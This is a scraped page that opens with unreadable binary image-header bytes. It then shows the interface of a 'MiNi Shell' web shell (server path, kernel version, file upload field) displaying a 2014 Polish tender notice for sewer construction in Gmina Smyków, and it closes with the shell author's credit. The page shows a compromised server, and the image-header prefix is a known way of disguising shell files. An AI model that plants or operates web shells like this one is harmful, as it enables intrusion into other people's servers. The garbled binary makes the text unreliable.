JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140917/308568-N-2014.html

<p class="kh_header"><b>Smyków: Budowa kanalizacji sanitarnej w Gminie Smyków dla miejscowości Smyków, Królewiec, Królewiec Poprzeczny, Salata, Zastawie, Adamów, Piaski Królewieckie. Etap II- miejscowość Królewiec, Królewiec Poprzeczny, Zastawie</b><br>
<b>Numer ogłoszenia: 308568 - 2014; data zamieszczenia: 17.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smyków , Smyków 91, 26-212 Smyków, woj. świętokrzyskie, tel. 0-41 3739181, faks 0-41 3739181.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smykow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.smykow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w Gminie Smyków dla miejscowości Smyków, Królewiec, Królewiec Poprzeczny, Salata, Zastawie, Adamów, Piaski Królewieckie. Etap II- miejscowość Królewiec, Królewiec Poprzeczny, Zastawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Etap II dla miejscowości Królewiec, Królewiec Poprzeczny, Zastawie.   

Parametry techniczne zaprojektowanych urządzeń:
a) Kanalizacja sanitarna w tym;
- rurociąg grawitacyjny PVC- U, klasy S,SN8 (lite) Dz200 mm i pozostałych łączone kielichowo na fabrycznie zamontowaną uszczelkę dwu elementową Sewer-Lock - kanały o długości 6 287,3 m.,
- rurociąg grawitacyjny PVC- U, klasy S, SN8 (lite) Dz160 mm- przyłącza wraz 
z instalacją wewnętrzną o długości 4 222,5 m., ( w tym przyłącza wraz z instalacją wewnętrzną w ilości 188 szt.), 
- rurociąg tłoczny PE 100 SDR17 PN10, Dz63 mm o długości 53,4 m.,
- rurociąg tłoczny PE 100 SDR17 PN10, Dz90 mm o długości 895,4 m.,
- rurociągi tłoczne PE 100 SDR17 PN10,Dz125 mm o długości 1 585,5 m.,
- studzienki kanalizacyjne włazowe, nie włazowe, kręgi betonowe (Rura karbowana) 
z betonu wibroprasowanego z osadzonymi stopniami złazowymi ; kinety prefabrykowane 
z osadzonymi przejściami szczelnymi, włazy żeliwne z wypełnieniem betonowym- wg. projektu budowlanego i przedmiaru robót który stanowi materiał pomocniczy,
b) Przepompownie ścieków, (studnie zlewcze), z kręgów betonowych, instalacją elektryczną, armatura hydrauliczna, automatyczny system sterowania pomp, szafą sterowniczą, kratą koszową, monitoring- jest GSM/SMS - 2 kpl., ( P-11, P- 11a)- wg. projektu budowlanego i przedmiaru robót który stanowi materiał pomocniczy, powinno być monitoring- GSM/GPRS, pompownia P-11, P-11a, polegające na analizie indywidualnej, to jest:
zakupie i montażu modułu telemetrycznego MT-101- kpl. -2, 
wykonaniu i zainstalowaniu oprogramowania- kpl.  - 2,
integracji systemu monitoringu i wizualizacji- kpl. - 2.
Modernizacja istniejącej  pompowni ścieków P12 w miejscowości Matyniów polegająca na montażu szafy sterowniczej z dostawą i montażem urządzeń monitoringu GSM/GPRS , w zakres dostawy i montażu wchodzi: moduł  telemetryczny MT-101, elementy montażowe, rozruch i konfigurację systemu, oprogramowanie sterowników, rozruch i konfigurację systemu, aplikacja wizualizacji.
c) Przydomowa pompownia ścieków  PD10- 1 szt., wg. projektu budowlanego i przedmiaru robót który stanowi materiał pomocniczy,
d) Rozebranie i odbudowa nawierzchni i podbudowy jezdni (pasa drogi),  wg. Projektu budowlanego i przedmiaru robót który stanowi materiał pomocniczy,
e) jak wyżej lecz chodników i zjazdów, pobocza rowu, wg. dokumentacji projektowej i przedmiaru robót, który stanowi materiał pomocniczy,
W zakres robót wchodzą również roboty budowlane związane z podstawowymi wymienionymi powyżej.
Zakres robót został objęty dokumentacją projektowa stanowiącą załącznik nr 9, oraz przedmiarem robót stanowiący załącznik  nr 10 do niniejszej SIWZ.
W przypadkach wskazania w dokumentacji technicznej znaków towarowych lub pochodzenia np. materiałów lub urządzeń, Zamawiający informuje, że dopuszcza możliwość zastosowania równoważnych rozwiązań (np. materiałów, urządzeń), tzn. takich, których parametry techniczne są równoważne - co najmniej takie same /nie gorsze/ od tych podanych w dokumentacji projektowej.
Materiały równoważne muszą być wymienione w ofercie z nazwy, a ciężar udowodnienia zachowania parametrów wymaganych przez Zamawiającego, w razie wątpliwości leży po stronie składającego ofertę. 
2. Sieć kanalizacyjną lokalizuje się w części: w pasie drogi krajowej- przejście poprzeczne, przewiert sterowany, droga  powiatowa- przejścia poprzeczne, część kanalizacji, droga gminna- przejścia poprzeczne, część kanalizacji
3. Szczegółowy zakres robót określony jest w załącznikach do SIWZ obejmujących:
a)projekt budowlany,
b)specyfikację techniczną wykonania i odbioru robót,
c)przedmiar robót.
4.Przy realizacji zamówienia Wykonawca będzie zobowiązany do stosowania jedynie wyrobów dopuszczonych do używania w budownictwie w rozumieniu ustawy z dnia 
7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243 poz.1623
ze zm.) oraz ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. 
z 2014r. poz.883) oraz innych przepisów, o ile mają zastosowanie. 
5.Materiały do wykonania należy przyjmować w kategorii i jakości nie niższej     (równoważnie) niż te wskazane w SIWZ i załącznikach do niej, zgodnie 
 z art. 30 ust. 4 ustawy. 
6. Zamawiający wymaga udzielenia gwarancji jakości na wykonany przedmiot 
zamówienia na okres nie krótszy niż 36-miesięcy, licząc od dnia odbioru 	końcowego robót.
7.Wykonawca, w zakresie realizowanego zamówienia, zobowiązany jest do zapewnienia pełnej obsługi geodezyjnej, nadzoru archeologicznego, (inwestor posiada uzgodniony projektu organizacji ruchu drogowego), uzyskania zgody na zajęcie pasa drogowego i uiszczenie opłat oraz realizowanie robót zgodnie z Decyzjami; Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddz. GDDKiA w Kielcach, Zarządu Dróg Powiatowych w Końskich, gmina Smyków jako Zarządca drogami gminnymi nie będzie pobierać opłat z tytułu umieszczenie urządzeń kanalizacji sanitarnej, powiadomienia zarządców nieruchomości o planowanym terminie prowadzenia prac, powiadomienia właścicieli instalacji uzbrojenia podziemnego o przystąpieniu do robót i zapewnienia wymaganych nadzorów branżowych, wykonania wszelkich badań i prób w tym inspekcji TV kanałów sanitarnych, wykonania inwentaryzacji powykonawczej, przywrócenia terenu i nawierzchni do stanu pierwotnego. 
8.Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie, gdzie mają być 
prowadzone roboty objęte przedmiotem zamówienia.
9.Wytwórcą i posiadaczem odpadów w trakcie realizacji przedmiotu umowy jest wykonawca.
W przypadku powierzenia przez Wykonawcę prac podwykonawcom, Wytwórca odpadów winien być jasno zdefiniowany w umowie zawartej pomiędzy Wykonawcą i Podwykonawcą..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   w trakcie wykonywania umowy  ma prawo zlecić Wykonawcy wykonanie uzupełniających robót, nie przekraczających 10 % wartości zamówienia podstawowego. 
a)Roboty będące przedmiotem niniejszej umowy obejmują wszystkie prace polegające na powtórzeniu twego samego rodzaju zamówienia podstawowego, które zostało przewidziane w ogłoszeniu przetargu nieograniczonego i ujęte w ofercie Wykonawcy.
b) Koszt robót uzupełniających wyliczony jest na podstawie dotychczasowych stawek ofertowych zamówienia podstawowego.
Zamawiający w trakcie wykonywania umowy  ma prawo zlecić Wykonawcy wykonanie dodatkowych robót, nie przekraczających 10 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.23.24.23-3, 45.31.00.00-3, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca ubiegając się o zamówienie wniesie wadium w wysokości: 100 000 złotych przed upływem terminu składania ofert.
2. Wadium może być wnoszone w jednej lub kilku formach:
- pieniądza - art. 45 ust. 7 ustawy, tzn. przelewem na rachunek  bankowy wskazany przez  Zamawiającego,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy musi być zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy
 z 9 listopada 2000 r. o utworzeniu PARP (Dz. U. z 2007r. Nr 42, poz. 275 ze zm.).
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące  
warunki ogólne i szczegółowe:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, a w szczególności koncesji, zezwoleń lub licencji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) Posiadają odpowiednią wiedzę i doświadczenie: - warunek zostanie spełniony jeśli Wykonawca w ciągu ostatnich pięciu  lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie wykonał co najmniej dwie roboty budowlane polegające na budowie kanalizacji sanitarnej grawitacyjnej i tłocznej oraz przepompowni ścieków o wartości brutto minimum 2.000.000,00 PLN każda., potwierdzone przez Zamawiających. z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz 
z załączeniem poświadczeń  dotyczących najważniejszych robót , określających , czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia: Warunek ten zostanie spełniony, jeżeli Wykonawca  wskaże osobę, która będzie uczestniczyć w wykonywaniu zamówienia tj. pełnić funkcję: kierownika budowy, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami budowlanymi, wydane na podstawie obowiązujących przepisów prawa (lub uprawnienia w zakresie sieci wodociągowych i kanalizacyjnych wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia). Kierownik budowy musi przedstawić Zamawiającemu dokumenty potwierdzające, iż prowadził min. 2 roboty budowlane o podobnym przedmiocie zamówienia (budowa kanalizacji sanitarnej grawitacyjnej i tłocznej o długości min. 3,0 kilometry, oraz przepompowni ścieków min. 2 szt.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek zostanie spełniony poprzez opłacanie polisy, lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywanym  przedmiotem zamówienia na wartość minimum 2.000.000 zł oraz przedstawią informację banku lub spółdzielczej kasy oszczędnościo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na wartość minimum 2.000.000 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy - pełnomocnictwo udzielone zgodnie z przepisami  ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2014 r. poz. 121.) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie.

Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Termin wystawienia stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.smykow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Smyków, Smyków 91, 26-212 Smyków - Józef-Ryszard Janus- Inspektor budownictwa, inwestycji i gospodarki przestrzennej pokój nr.14 tel:41/3739184.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2014 godzina 11:00, miejsce: Urząd Gminy Smyków, Smyków 91, 26-212 Smyków,w pokoju nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com